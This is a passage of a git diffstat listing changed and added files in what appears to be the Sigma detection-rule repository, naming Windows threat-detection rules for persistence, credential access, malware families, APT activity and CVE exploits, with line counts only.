5 +- ...registry_set_disable_defender_firewall.yml | 6 +- .../registry_set_disable_function_user.yml | 3 +- ...stry_set_disable_macroruntimescanscope.yml | 3 +- 
..._disable_security_center_notifications.yml | 3 +- .../registry_set_disable_system_restore.yml | 3 +- .../registry_set_disable_uac_registry.yml | 4 +- ...y_set_disable_windows_defender_service.yml | 5 +- .../registry_set_disable_winevt_logging.yml | 19 +- ...it_guard_net_protection_on_ms_defender.yml | 3 +- ...t_disabled_microsoft_defender_eventlog.yml | 9 +- ...amper_protection_on_microsoft_defender.yml | 4 +- .../registry_set_disallowrun_execution.yml | 3 +- ...sk_cleanup_handler_autorun_persistence.yml | 19 +- .../registry_set_dns_over_https_enabled.yml | 13 +- ...gistry_set_dns_server_level_plugin_dll.yml | 12 +- .../registry_set_dot_net_etw_tamper.yml | 6 +- ...et_enabling_cor_profiler_env_variables.yml | 3 +- .../registry_set_enabling_turnoffcheck.yml | 3 +- .../registry_set_evtx_file_key_tamper.yml | 4 +- ...ry_set_exploit_guard_susp_allowed_apps.yml | 7 +- .../registry_set_fax_change_service_user.yml | 3 +- .../registry_set_fax_dll_persistance.yml | 2 +- .../registry_set_file_association_exefile.yml | 3 +- ...egistry_set_hangs_debugger_persistence.yml | 3 +- .../registry_set_hhctrl_persistence.yml | 3 +- .../registry_set/registry_set_hide_file.yml | 3 +- .../registry_set_hide_function_user.yml | 3 +- ...t_hide_scheduled_task_via_index_tamper.yml | 18 +- ...urity_zone_protocol_defaults_downgrade.yml | 12 +- ...registry_set_ime_non_default_extension.yml | 23 +- .../registry_set_ime_suspicious_paths.yml | 38 +- ...stry_set_install_root_or_ca_certificat.yml | 3 +- ...t_explorer_disable_first_run_customize.yml | 14 +- .../registry_set_legalnotice_susp_message.yml | 4 +- ...y_set_lolbin_onedrivestandaloneupdater.yml | 10 +- ...egistry_set_lsa_disablerestrictedadmin.yml | 18 +- .../registry_set_lsass_usermode_dumping.yml | 6 +- .../registry_set/registry_set_mal_adwind.yml | 4 +- .../registry_set_mal_blue_mockingbird.yml | 4 +- ...istry_set_net_cli_ngenassemblyusagelog.yml | 15 +- ...tsh_help_dll_persistence_susp_location.yml | 39 +- 
...netsh_helper_dll_potential_persistence.yml | 15 +- ...registry_set_new_application_appcompat.yml | 6 +- .../registry_set_new_network_provider.yml | 8 +- .../registry_set_odbc_driver_registered.yml | 3 +- ...gistry_set_odbc_driver_registered_susp.yml | 3 +- ...registry_set_office_access_vbom_tamper.yml | 8 +- ...office_disable_protected_view_features.yml | 15 +- .../registry_set_office_enable_dde.yml | 3 +- ...ook_enable_load_macro_provider_on_boot.yml | 3 +- ..._office_outlook_enable_macro_execution.yml | 5 +- ...utlook_enable_unsafe_client_mail_rules.yml | 11 +- ...y_set_office_outlook_security_settings.yml | 4 +- ..._set_office_trust_record_susp_location.yml | 8 +- ...y_set_office_trusted_location_uncommon.yml | 14 +- ...egistry_set_office_vba_warnings_tamper.yml | 7 +- ...ce_app_cpmpat_layer_registerapprestart.yml | 11 +- .../registry_set_persistence_app_paths.yml | 19 +- .../registry_set_persistence_autodial_dll.yml | 3 +- .../registry_set_persistence_chm.yml | 3 +- ...rsistence_com_hijacking_susp_locations.yml | 13 +- ..._persistence_comhijack_psfactorybuffer.yml | 3 +- ...et_persistence_custom_protocol_handler.yml | 15 +- ...et_persistence_event_viewer_events_asp.yml | 9 +- .../registry_set_persistence_globalflags.yml | 7 +- .../registry_set_persistence_ie.yml | 9 +- .../registry_set_persistence_ifilter.yml | 66 +- ...registry_set_persistence_lsa_extension.yml | 10 +- .../registry_set_persistence_mpnotify.yml | 6 +- .../registry_set_persistence_mycomputer.yml | 7 +- ...istry_set_persistence_natural_language.yml | 8 +- .../registry_set_persistence_office_vsto.yml | 6 +- ...stry_set_persistence_outlook_todaypage.yml | 7 +- ...gistry_set_persistence_reflectdebugger.yml | 9 +- .../registry_set_persistence_scrobj_dll.yml | 3 +- .../registry_set_persistence_search_order.yml | 9 +- ...registry_set_persistence_shim_database.yml | 11 +- ...istence_shim_database_susp_application.yml | 4 +- ...stence_shim_database_uncommon_location.yml | 3 +- 
.../registry_set_persistence_typed_paths.yml | 4 +- .../registry_set_persistence_xll.yml | 3 +- ...istry_set_policies_associations_tamper.yml | 5 +- ...gistry_set_policies_attachments_tamper.yml | 9 +- ...y_set_powershell_enablescripts_enabled.yml | 7 +- ...gistry_set_powershell_execution_policy.yml | 19 +- .../registry_set_powershell_in_run_keys.yml | 2 +- ...gistry_set_powershell_logging_disabled.yml | 8 +- ...egistry_set_provisioning_command_abuse.yml | 18 +- ...set_renamed_sysinternals_eula_accepted.yml | 16 +- .../registry_set_rpcrt4_etw_tamper.yml | 8 +- ...stry_set_scr_file_executed_by_rundll32.yml | 3 +- .../registry_set_servicedll_hijack.yml | 3 +- .../registry_set_services_etw_tamper.yml | 5 +- .../registry_set_set_nopolicies_user.yml | 3 +- .../registry_set_sip_persistence.yml | 4 +- .../registry_set_sophos_av_tamper.yml | 3 +- .../registry_set_special_accounts.yml | 10 +- ...ry_set_suppress_defender_notifications.yml | 3 +- ...registry_set_susp_keyboard_layout_load.yml | 16 +- ...y_set_susp_pendingfilerenameoperations.yml | 6 +- .../registry_set_susp_printer_driver.yml | 6 +- ...stry_set_susp_reg_persist_explorer_run.yml | 3 +- .../registry_set_susp_run_key_img_folder.yml | 31 +- .../registry_set_susp_service_installed.yml | 15 +- .../registry_set_susp_user_shell_folders.yml | 9 +- .../registry_set_suspicious_env_variables.yml | 73 +- .../registry_set_system_lsa_nolmhash.yml | 14 +- .../registry_set_taskcache_entry.yml | 11 +- .../registry_set_telemetry_persistence.yml | 25 +- ...egistry_set_terminal_server_suspicious.yml | 35 +- ...registry_set_terminal_server_tampering.yml | 59 +- .../registry_set_timeproviders_dllname.yml | 10 +- ...y_set_tls_protocol_old_version_enabled.yml | 3 +- .../registry_set_treatas_persistence.yml | 4 + .../registry_set_turn_on_dev_features.yml | 8 +- .../registry_set_uac_bypass_sdclt.yml | 3 +- .../registry_set_uac_bypass_winsat.yml | 3 +- .../registry_set_uac_bypass_wmp.yml | 6 +- .../registry_set_vbs_payload_stored.yml | 3 
+- .../registry_set_wab_dllpath_reg_change.yml | 3 +- ..._set_wdigest_enable_uselogoncredential.yml | 4 +- .../registry_set_windows_defender_tamper.yml | 14 +- ...ry_set_winget_admin_settings_tampering.yml | 6 +- ...istry_set_winget_enable_local_manifest.yml | 7 +- ...set_winlogon_allow_multiple_tssessions.yml | 10 +- .../registry_set_winlogon_notify_key.yml | 10 +- .../sysmon/sysmon_config_modification.yml | 7 +- .../sysmon_config_modification_error.yml | 3 +- .../sysmon_config_modification_status.yml | 3 +- .../sysmon/sysmon_file_block_executable.yml | 5 +- .../sysmon/sysmon_file_block_shredding.yml | 5 +- .../sysmon_file_executable_detected.yml | 5 +- ...e_remote_thread_win_powershell_generic.yml | 7 +- .../file_delete_win_zone_identifier_ads.yml | 8 +- .../file_event_win_dump_file_creation.yml | 4 +- .../file_event_win_susp_binary_dropper.yml | 38 +- ...ile_event_win_vscode_tunnel_indicators.yml | 7 +- ...file_event_win_webdav_tmpfile_creation.yml | 3 +- .../image_load_dll_amsi_uncommon_process.yml | 5 +- .../image_load_dll_system_drawing_load.yml | 7 +- .../image_load_office_excel_xll_load.yml | 3 +- ...net_connection_win_dfsvc_suspicious_ip.yml | 17 +- ...eated_sysinternals_psexec_default_pipe.yml | 11 +- ...roc_access_win_lsass_powershell_access.yml | 11 +- ...c_access_win_lsass_susp_source_process.yml | 10 +- ..._access_win_lsass_uncommon_access_flag.yml | 15 +- .../proc_creation_win_csc_compilation.yml | 12 +- .../proc_creation_win_curl_download.yml | 19 +- .../proc_creation_win_curl_execution.yml | 11 +- .../proc_creation_win_curl_fileupload.yml | 21 +- .../proc_creation_win_curl_useragent.yml | 6 +- ...roc_creation_win_dfsvc_child_processes.yml | 6 +- ..._creation_win_diskshadow_child_process.yml | 20 +- ...oc_creation_win_diskshadow_script_mode.yml | 29 +- ...oc_creation_win_findstr_password_recon.yml | 27 +- .../proc_creation_win_net_quic.yml | 21 +- ...roc_creation_win_office_svchost_parent.yml | 11 +- ...n_powershell_abnormal_commandline_size.yml | 
21 +- ...eation_win_powershell_crypto_namespace.yml | 30 +- ..._creation_win_powershell_import_module.yml | 22 +- ...on_win_regsvr32_dllregisterserver_exec.yml | 48 +- ...reation_win_rundll32_dllregisterserver.yml | 25 +- ...c_creation_win_susp_compression_params.yml | 5 +- ...reation_win_susp_elevated_system_shell.yml | 29 +- ...proc_creation_win_susp_event_log_query.yml | 30 +- ...win_susp_file_permission_modifications.yml | 24 +- .../proc_creation_win_taskkill_execution.yml | 20 +- ...oc_creation_win_wmic_recon_system_info.yml | 28 +- .../registry_set_office_trusted_location.yml | 11 +- ...gistry_set_powershell_crypto_namespace.yml | 16 +- .../dns_query_win_possible_dns_rebinding.yml | 7 +- ...load_invoke_obfuscation_clip+_services.yml | 6 +- ...ke_obfuscation_obfuscated_iex_services.yml | 21 +- ...oad_invoke_obfuscation_stdin+_services.yml | 6 +- ..._load_invoke_obfuscation_var+_services.yml | 7 +- ...voke_obfuscation_via_compress_services.yml | 6 +- ...invoke_obfuscation_via_rundll_services.yml | 6 +- ..._invoke_obfuscation_via_stdin_services.yml | 6 +- ...voke_obfuscation_via_use_clip_services.yml | 6 +- ...oke_obfuscation_via_use_mshta_services.yml | 6 +- ..._obfuscation_via_use_rundll32_services.yml | 6 +- ..._invoke_obfuscation_via_var++_services.yml | 8 +- ...tstrike_getsystem_service_installation.yml | 49 +- .../driver_load_tap_driver_installation.yml | 7 +- ...ript_creation_by_office_using_file_ext.yml | 5 +- ..._correlation_apt_silence_downloader_v3.yml | 7 +- ..._correlation_apt_turla_commands_medium.yml | 6 +- ...tion_dnscat2_powershell_implementation.yml | 6 +- ...tion_win_correlation_multiple_susp_cli.yml | 5 +- ...orrelation_susp_builtin_commands_recon.yml | 44 +- ...d_cmd_and_powershell_spawned_processes.yml | 10 +- .../sysmon_non_priv_program_files_move.yml | 3 +- ..._party_drivers_exploits_token_stealing.yml | 7 +- ...ivilege_escalation_using_rotten_potato.yml | 14 +- ...uspicious_werfault_connection_outbound.yml | 9 +- 
.../wmi_event/sysmon_wmi_susp_scripting.yml | 35 +- .../Other/win_av_relevant_match.yml | 106 + .../win_application_msmpeng_crash_error.yml | 35 + ...in_werfault_susp_lsass_credential_dump.yml | 29 + .../esent/win_esent_ntdsutil_abuse.yml | 32 + ...win_esent_ntdsutil_abuse_susp_location.yml | 38 + .../win_audit_cve.yml | 45 + .../win_susp_backup_delete.yml | 27 + ...in_software_restriction_policies_block.yml | 31 + .../win_builtin_remove_application.yml | 27 + .../win_msi_install_from_susp_locations.yml | 41 + .../msiinstaller/win_msi_install_from_web.yml | 31 + .../win_software_atera_rmm_agent_install.yml | 26 + .../win_mssql_add_sysadmin_account.yml | 29 + .../win_mssql_disable_audit_settings.yml | 31 + .../mssqlserver/win_mssql_failed_logon.yml | 30 + ...sql_failed_logon_from_external_network.yml | 52 + .../win_mssql_sp_procoption_set.yml | 30 + .../win_mssql_xp_cmdshell_audit_log.yml | 31 + .../win_mssql_xp_cmdshell_change.yml | 28 + ...ccess_tools_screenconnect_command_exec.yml | 30 + ...cess_tools_screenconnect_file_transfer.yml | 30 + .../win_application_msmpeng_crash_wer.yml | 32 + ..._applocker_file_was_not_allowed_to_run.yml | 49 + ...time_sysinternals_tools_appx_execution.yml | 31 + ..._appxdeployment_server_applocker_block.yml | 24 + ...n_appxdeployment_server_mal_appx_names.yml | 31 + ...win_appxdeployment_server_policy_block.yml | 28 + ..._server_susp_appx_package_installation.yml | 27 + ...win_appxdeployment_server_susp_domains.yml | 52 + ...ployment_server_susp_package_locations.yml | 40 + ...ment_server_uncommon_package_locations.yml | 40 + ...n_appxpackaging_om_sups_appx_signature.yml | 27 + .../win_bits_client_new_job_via_bitsadmin.yml | 27 + ...win_bits_client_new_job_via_powershell.yml | 29 + ...nt_new_transfer_saving_susp_extensions.yml | 41 + ..._new_transfer_via_file_sharing_domains.yml | 53 + ...its_client_new_transfer_via_ip_address.yml | 78 + ...s_client_new_transfer_via_uncommon_tld.yml | 33 + 
..._client_new_trasnfer_susp_local_folder.yml | 31 + ..._capi2_acquire_certificate_private_key.yml | 25 + .../category/antivirus/av_exploiting.yml | 69 + .../category/antivirus/av_hacktool.yml | 86 + .../category/antivirus/av_password_dumper.yml | 63 + .../category/antivirus/av_ransomware.yml | 61 + .../category/antivirus/av_relevant_files.yml | 99 + .../category/antivirus/av_webshell.yml | 103 + ...sclient_lifecycle_system_cert_exported.yml | 24 + .../win_codeintegrity_attempted_dll_load.yml | 106 + ...tegrity_blocked_protected_process_file.yml | 25 + ...in_codeintegrity_enforced_policy_block.yml | 27 + ...n_codeintegrity_revoked_driver_blocked.yml | 26 + ...in_codeintegrity_revoked_driver_loaded.yml | 27 + ...in_codeintegrity_revoked_image_blocked.yml | 25 + ...win_codeintegrity_revoked_image_loaded.yml | 27 + ...n_codeintegrity_unsigned_driver_loaded.yml | 25 + ...in_codeintegrity_unsigned_image_loaded.yml | 25 + .../win_codeintegrity_whql_failure.yml | 32 + .../builtin/deprecated/posh_pm_powercat.yml | 33 + .../posh_ps_access_to_chrome_login_data.yml | 38 + .../posh_ps_azurehound_commands.yml | 36 + .../posh_ps_cl_invocation_lolscript.yml | 32 + .../posh_ps_cl_mutexverifiers_lolscript.yml | 32 + .../posh_ps_file_and_directory_discovery.yml | 37 + .../deprecated/posh_ps_invoke_nightmare.yml | 29 + .../builtin/deprecated/posh_ps_susp_gwmi.yml | 37 + .../powershell_suspicious_download.yml | 28 + ...wershell_suspicious_invocation_generic.yml | 33 + ...ershell_suspicious_invocation_specific.yml | 72 + ...owershell_syncappvpublishingserver_exe.yml | 30 + ...proc_creation_win_apt_apt29_thinktanks.yml | 32 + .../proc_creation_win_apt_dragonfly.yml | 30 + .../proc_creation_win_apt_gallium.yml | 36 + .../proc_creation_win_apt_hurricane_panda.yml | 31 + ...reation_win_apt_lazarus_activity_apr21.yml | 35 + .../proc_creation_win_apt_lazarus_loader.yml | 46 + ..._creation_win_apt_muddywater_dnstunnel.yml | 31 + .../proc_creation_win_apt_ta505_dropper.yml | 30 + 
...c_creation_win_certutil_susp_execution.yml | 57 + .../proc_creation_win_cmd_read_contents.yml | 36 + ...oc_creation_win_cmd_redirect_to_stream.yml | 31 + ...tial_acquisition_registry_hive_dumping.yml | 35 + .../proc_creation_win_cscript_vbs.yml | 33 + ...ion_mssql_xp_cmdshell_stored_procedure.yml | 34 + .../proc_creation_win_indirect_cmd.yml | 35 + ...in_indirect_command_execution_forfiles.yml | 47 + ...tion_win_invoke_obfuscation_via_rundll.yml | 32 + ...in_invoke_obfuscation_via_use_rundll32.yml | 37 + ...eation_win_lolbas_execution_of_wuauclt.yml | 36 + .../proc_creation_win_lolbin_findstr.yml | 49 + .../proc_creation_win_lolbin_office.yml | 33 + .../proc_creation_win_lolbin_rdrleakdiag.yml | 33 + ...ion_win_lolbins_by_office_applications.yml | 53 + .../deprecated/proc_creation_win_mal_ryuk.yml | 37 + ...on_win_malware_trickbot_recon_activity.yml | 32 + .../proc_creation_win_mavinject_proc_inj.yml | 28 + .../proc_creation_win_msdt_diagcab.yml | 33 + ...proc_creation_win_new_service_creation.yml | 34 + ...tion_win_nslookup_pwsh_download_cradle.yml | 27 + .../proc_creation_win_odbcconf_susp_exec.yml | 42 + ..._from_proxy_executing_regsvr32_payload.yml | 51 + ...from_proxy_executing_regsvr32_payload2.yml | 53 + ...on_win_office_spawning_wmi_commandline.yml | 41 + ...creation_win_possible_applocker_bypass.yml | 42 + ...n_powershell_amsi_bypass_pattern_nov22.yml | 34 + ..._powershell_base64_invoke_susp_cmdlets.yml | 45 + ...n_powershell_base64_listing_shadowcopy.yml | 35 + ...eation_win_powershell_base64_shellcode.yml | 28 + .../proc_creation_win_powershell_bitsjob.yml | 35 + ...on_win_powershell_service_modification.yml | 44 + ...ion_win_powershell_xor_encoded_command.yml | 40 + .../proc_creation_win_reg_dump_sam.yml | 34 + .../proc_creation_win_regsvr32_anomalies.yml | 90 + .../proc_creation_win_renamed_paexec.yml | 43 + ...reation_win_root_certificate_installed.yml | 37 + .../proc_creation_win_run_from_zip.yml | 26 + 
...roc_creation_win_sc_delete_av_services.yml | 123 + .../proc_creation_win_schtasks_user_temp.yml | 34 + .../proc_creation_win_service_stop.yml | 49 + .../proc_creation_win_susp_bitstransfer.yml | 33 + ...eation_win_susp_cmd_exectution_via_wmi.yml | 32 + ...oc_creation_win_susp_commandline_chars.yml | 36 + ...c_creation_win_susp_lolbin_non_c_drive.yml | 45 + .../proc_creation_win_susp_run_folder.yml | 40 + ...proc_creation_win_susp_squirrel_lolbin.yml | 86 + ..._sysinternals_psexec_service_execution.yml | 42 + ...eation_win_sysinternals_psexesvc_start.yml | 25 + .../proc_creation_win_whoami_as_system.yml | 32 + .../proc_creation_win_winword_dll_load.yml | 29 + ..._win_wmic_execution_via_office_process.yml | 41 + .../proc_creation_win_wmic_remote_command.yml | 34 + .../proc_creation_win_wmic_remote_service.yml | 36 + .../proc_creation_win_wuauclt_execution.yml | 38 + ..._creation_syncappvpublishingserver_exe.yml | 26 + ...add_sysinternals_sdelete_registry_keys.yml | 28 + ...istry_event_asep_reg_keys_modification.yml | 208 + ...sing_windows_telemetry_for_persistence.yml | 50 + .../registry_set_add_hidden_user.yml | 28 + ...ble_microsoft_office_security_features.yml | 40 + .../registry_set_office_security.yml | 31 + .../registry_set_silentprocessexit.yml | 28 + .../deprecated/sysmon_rclone_execution.yml | 50 + .../deprecated/win_defender_disabled.yml | 31 + .../win_dsquery_domain_trust_discovery.yml | 31 + .../win_lateral_movement_condrv.yml | 31 + .../win_security_event_log_cleared.yml | 30 + ...in_security_group_modification_logging.yml | 69 + ...in_security_lolbas_execution_of_nltest.yml | 34 + .../deprecated/win_susp_esentutl_activity.yml | 34 + .../win_susp_vssadmin_ntds_activity.yml | 42 + ..._service_install_susp_double_ampersand.yml | 27 + ...diagnosis_scripted_load_remote_diagcab.yml | 25 + .../win_dns_client__mal_cobaltstrike.yml | 35 + .../win_dns_client_anonymfiles_com.yml | 29 + .../dns_client/win_dns_client_mega_nz.yml | 29 + 
.../dns_client/win_dns_client_tor_onion.yml | 29 + .../dns_client/win_dns_client_ufile_io.yml | 30 + ...in_dns_server_failed_dns_zone_transfer.yml | 24 + ...ns_server_susp_server_level_plugin_dll.yml | 35 + .../win_usb_device_plugged.yml | 30 + .../Axiom/proc_creation_win_apt_zxshell.yml | 38 + ...eation_win_apt_turla_commands_critical.yml | 36 + ...oc_creation_win_apt_turla_comrat_may20.yml | 37 + ...roc_creation_win_exploit_cve_2015_1641.yml | 30 + ...roc_creation_win_exploit_cve_2017_0261.yml | 32 + ...oc_creation_win_exploit_cve_2017_11882.yml | 34 + ...roc_creation_win_exploit_cve_2017_8759.yml | 33 + .../proc_creation_win_malware_adwind.yml | 34 + .../proc_creation_win_malware_fireball.yml | 34 + .../proc_creation_win_malware_notpetya.yml | 42 + ...n_win_malware_plugx_susp_exe_locations.yml | 101 + .../StoneDrill/win_system_apt_stonedrill.yml | 30 + .../proc_creation_win_malware_wannacry.yml | 68 + ...oc_creation_win_apt_apt10_cloud_hopper.yml | 33 + .../proc_creation_win_apt_ta17_293a_ps.yml | 31 + ...on_win_apt_lazarus_binary_masquerading.yml | 33 + .../win_system_apt_carbonpaper_turla.yml | 32 + .../win_system_apt_turla_service_png.yml | 29 + .../proc_creation_win_malware_elise.yml | 41 + ..._creation_win_apt_apt27_emissary_panda.yml | 35 + .../TA/APT28/proc_creation_win_apt_sofacy.yml | 44 + ...apt_apt29_phishing_campaign_indicators.yml | 35 + ...c_creation_win_apt_muddywater_activity.yml | 44 + .../proc_creation_win_apt_oilrig_mar18.yml | 56 + .../OilRig/win_security_apt_oilrig_mar18.yml | 43 + .../TA/OilRig/win_system_apt_oilrig_mar18.yml | 44 + .../proc_creation_win_apt_slingshot.yml | 34 + .../Slingshot/win_security_apt_slingshot.yml | 32 + .../proc_creation_win_apt_tropictrooper.yml | 25 + ...roc_creation_win_exploit_other_bearlpe.yml | 35 + ...roc_creation_win_exploit_cve_2019_1388.yml | 37 + .../proc_creation_win_malware_babyshark.yml | 38 + .../proc_creation_win_malware_dridex.yml | 55 + .../proc_creation_win_malware_dtrack.yml | 44 + 
.../proc_creation_win_malware_emotet.yml | 51 + .../proc_creation_win_malware_formbook.yml | 57 + ...tion_win_malware_lockergoga_ransomware.yml | 29 + .../QBot/proc_creation_win_malware_qbot.yml | 39 + .../Ryuk/proc_creation_win_malware_ryuk.yml | 56 + ...creation_win_malware_snatch_ransomware.yml | 33 + ...c_creation_win_apt_aptc12_bluemushroom.yml | 31 + ...creation_win_apt_apt31_judgement_panda.yml | 42 + ...c_creation_win_apt_bear_activity_gtr19.yml | 35 + .../proc_creation_win_apt_empiremonkey.yml | 30 + ...ation_win_apt_equationgroup_dll_u_load.yml | 32 + .../proc_creation_win_apt_mustangpanda.yml | 40 + .../proc_creation_win_apt_wocao.yml | 48 + .../win_security_apt_wocao.yml | 36 + .../CVE-2020-0688/win_vul_cve_2020_0688.yml | 32 + ...oc_creation_win_exploit_cve_2020_10189.yml | 43 + ...roc_creation_win_exploit_cve_2020_1048.yml | 36 + ...roc_creation_win_exploit_cve_2020_1350.yml | 37 + ..._creation_win_malware_blue_mockingbird.yml | 37 + ..._win_malware_emotet_rundll32_execution.yml | 41 + ...creation_win_malware_ke3chang_tidepool.yml | 37 + ...c_creation_win_malware_maze_ransomware.yml | 46 + .../proc_creation_win_apt_evilnum_jul20.yml | 33 + .../proc_creation_win_apt_gallium_iocs.yml | 110 + .../GALLIUM/win_dns_analytic_apt_gallium.yml | 40 + .../proc_creation_win_apt_greenbug_may20.yml | 56 + ...reation_win_apt_lazarus_group_activity.yml | 64 + .../proc_creation_win_apt_unc2452_cmds.yml | 60 + .../proc_creation_win_apt_unc2452_ps.yml | 37 + ...ation_win_apt_unc2452_vbscript_pattern.yml | 34 + .../proc_creation_win_apt_taidoor.yml | 33 + ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 42 + .../proc_creation_win_apt_winnti_pipemon.yml | 34 + .../av_printernightmare_cve_2021_34527.yml | 45 + ...win_exploit_cve_2021_1675_printspooler.yml | 47 + ...cve_2021_1675_printspooler_operational.yml | 34 + ...it_cve_2021_1675_printspooler_security.yml | 32 + ...it_cve_2021_26084_atlassian_confluence.yml | 46 + ..._win_exploit_cve_2021_26857_msexchange.yml | 32 + 
...ation_win_exploit_cve_2021_35211_servu.yml | 35 + ...oc_creation_win_exploit_cve_2021_40444.yml | 38 + ..._2021_40444_office_directory_traversal.yml | 41 + ...oc_creation_win_exploit_cve_2021_41379.yml | 41 + .../CVE-2021-41379/win_vul_cve_2021_41379.yml | 29 + .../win_system_exploit_cve_2021_42278.yml | 40 + ...samaccountname_spoofing_cve_2021_42287.yml | 35 + ...n_win_exploit_other_razorinstaller_lpe.yml | 31 + ...tion_win_exploit_other_systemnightmare.yml | 30 + ...cve_2021_31979_cve_2021_33771_exploits.yml | 38 + .../Exploits/win_exchange_cve_2021_42321.yml | 32 + ...ation_win_malware_blackbyte_ransomware.yml | 39 + .../Conti/proc_creation_win_malware_conti.yml | 33 + .../proc_creation_win_malware_conti_7zip.yml | 30 + ..._win_malware_conti_ransomware_commands.yml | 35 + ...malware_conti_ransomware_database_dump.yml | 39 + ...eation_win_malware_darkside_ransomware.yml | 34 + ...win_malware_devil_bait_output_redirect.yml | 43 + ...win_malware_goofy_guineapig_broken_cmd.yml | 25 + ...g_googleupdate_uncommon_child_instance.yml | 31 + ...re_goofy_guineapig_service_persistence.yml | 30 + ...creation_win_malware_pingback_backdoor.yml | 38 + ...eation_win_malware_small_sieve_cli_arg.yml | 26 + ...y_set_malware_small_sieve_evasion_typo.yml | 29 + .../HAFNIUM/proc_creation_win_apt_hafnium.yml | 81 + .../proc_creation_win_apt_revil_kaseya.yml | 50 + .../proc_creation_win_apt_sourgrum.yml | 44 + ...win_exploit_cve_2023_21554_queuejumper.yml | 39 + ...eation_win_exploit_cve_2022_29072_7zip.yml | 41 + ..._win_exploit_cve_2022_41120_sysmon_eop.yml | 44 + ...re_bluesky_ransomware_files_indicators.yml | 35 + ...on_win_malware_hermetic_wiper_activity.yml | 36 + ...raspberry_robin_single_dot_ending_file.yml | 29 + .../2022/Malware/win_mssql_sp_maggie.yml | 28 + ..._creation_win_apt_actinium_persistence.yml | 32 + .../MERCURY/proc_creation_win_apt_mercury.yml | 30 + ...023_22518_confluence_tomcat_child_proc.yml | 47 + ...ve_2023_23397_outlook_reminder_trigger.yml | 33 + 
...e_2023_23397_outlook_remote_file_query.yml | 39 + ...oit_cve_2023_23397_outlook_remote_file.yml | 53 + ..._windows_html_rce_share_access_pattern.yml | 32 + ...ploit_cve_2023_38831_winrar_child_proc.yml | 46 + ...on_exploit_cve_2023_40477_winrar_crash.yml | 37 + .../Exploits/win_msmq_corrupted_packet.yml | 26 + ...in_malware_coldsteel_anonymous_process.yml | 29 + ..._malware_coldsteel_service_persistence.yml | 30 + ...ry_set_malware_coldsteel_created_users.yml | 31 + ..._malware_coldsteel_persistence_service.yml | 31 + ..._autoit3_from_susp_parent_and_location.yml | 41 + ...win_malware_darkgate_net_user_creation.yml | 35 + ..._creation_win_malware_griffon_patterns.yml | 28 + ...ware_icedid_rundll32_dllregisterserver.yml | 30 + ...re_pikabot_combined_commands_execution.yml | 48 + ...win_malware_pikabot_rundll32_discovery.yml | 36 + ...win_malware_pikabot_rundll32_hollowing.yml | 37 + ...n_malware_qakbot_regsvr32_calc_pattern.yml | 30 + ..._win_malware_qakbot_rundll32_execution.yml | 43 + ...on_win_malware_qakbot_rundll32_exports.yml | 71 + ...are_qakbot_rundll32_fake_dll_execution.yml | 43 + ...win_malware_qakbot_uninstaller_cleanup.yml | 34 + ...alware_rhadamanthys_stealer_dll_launch.yml | 35 + ..._malware_rorschach_ransomware_activity.yml | 36 + ...n_win_malware_snake_installer_cli_args.yml | 29 + ...ation_win_malware_snake_installer_exec.yml | 37 + ...on_win_malware_snake_service_execution.yml | 27 + ...y_event_malware_snake_covert_store_key.yml | 23 + ...gistry_set_malware_snake_encrypted_key.yml | 29 + ...stem_malware_snake_persistence_service.yml | 28 + ...n_win_malware_3cx_compromise_execution.yml | 104 + ...n_malware_3cx_compromise_susp_children.yml | 52 + ...win_malware_3cx_compromise_susp_update.yml | 47 + ...ity_apt_cozy_bear_scheduled_tasks_name.yml | 50 + ..._cozy_bear_graphical_proton_task_names.yml | 51 + ...ation_win_apt_diamond_sleet_indicators.yml | 25 + ...event_apt_diamond_sleet_scheduled_task.yml | 29 + 
...urity_apt_diamond_sleet_scheduled_task.yml | 31 + .../TA/FIN7/posh_ps_apt_fin7_powerhold.yml | 34 + .../posh_ps_apt_fin7_powertrash_execution.yml | 36 + ...n_apt_fin7_powertrash_lateral_movement.yml | 34 + ...posh_ps_apt_lace_tempest_eraser_script.yml | 36 + ...h_ps_apt_lace_tempest_malware_launcher.yml | 35 + ...pt_lace_tempest_cobalt_strike_download.yml | 27 + ..._win_apt_lace_tempest_loader_execution.yml | 27 + ...storm_aspera_faspex_susp_child_process.yml | 120 + ...int_sandstorm_log4j_wstomcat_execution.yml | 28 + ...storm_manage_engine_susp_child_process.yml | 127 + ...ation_win_apt_mustang_panda_indicators.yml | 34 + ...int_management_exploitation_indicators.yml | 39 + ...t_print_management_exploitation_pc_app.yml | 45 + ...ion_win_apt_peach_sandstorm_indicators.yml | 26 + .../firewall_as/win_firewall_as_add_rule.yml | 41 + .../win_firewall_as_add_rule_susp_folder.yml | 46 + .../win_firewall_as_change_rule.yml | 29 + .../win_firewall_as_delete_all_rules.yml | 34 + .../win_firewall_as_delete_rule.yml | 38 + .../win_firewall_as_failed_load_gpo.yml | 23 + .../win_firewall_as_reset_config.yml | 25 + .../win_firewall_as_setting_change.yml | 29 + .../win_lsa_server_normal_user_admin.yml | 39 + .../win_exchange_proxylogon_oabvirtualdir.yml | 32 + ...ange_proxyshell_certificate_generation.yml | 34 + ...win_exchange_proxyshell_mailbox_export.yml | 35 + ...hange_proxyshell_remove_mailbox_export.yml | 28 + ...ge_set_oabvirtualdirectory_externalurl.yml | 29 + .../win_exchange_transportagent.yml | 30 + .../win_exchange_transportagent_failed.yml | 29 + .../builtin/ntlm/win_susp_ntlm_auth.yml | 28 + .../ntlm/win_susp_ntlm_brute_force.yml | 35 + .../builtin/ntlm/win_susp_ntlm_rdp.yml | 34 + ...shd_openssh_server_listening_on_socket.yml | 30 + ...on_win_userdomain_variable_enumeration.yml | 28 + ...osh_pc_abuse_nslookup_with_dns_records.yml | 35 + .../posh_pc_delete_volume_shadow_copies.yml | 32 + .../posh_pc_downgrade_attack.yml | 29 + .../posh_pc_exe_calling_ps.yml | 32 
